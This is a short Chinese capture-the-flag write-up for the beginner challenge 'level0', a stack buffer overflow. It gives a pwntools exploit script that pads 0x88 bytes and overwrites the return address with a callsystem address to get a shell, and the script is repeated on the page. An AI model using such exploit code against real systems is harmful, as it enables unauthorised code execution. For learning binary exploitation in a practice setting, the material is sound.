简单的栈溢出
![](https://img.haomeiwen.com/i12343640/fe504120f207971b.png)
覆盖返回地址为callsystem即可
exp:
from pwn import *
p = process('./level0')
# p = remote("111.198.29.45","31008")
call_system = 0x400596
payload = 0x88*'a' + p64(call_system)
p.sendline(payload)
p.interactive()
简单的栈溢出
覆盖返回地址为callsystem即可
exp:
from pwn import *
p = process('./level0')
# p = remote("111.198.29.45","31008")
call_system = 0x400596
payload = 0x88*'a' + p64(call_system)
p.sendline(payload)
p.interactive()
本文标题:新手练习05-level0
本文链接:https://www.haomeiwen.com/subject/jigoeqtx.html
网友评论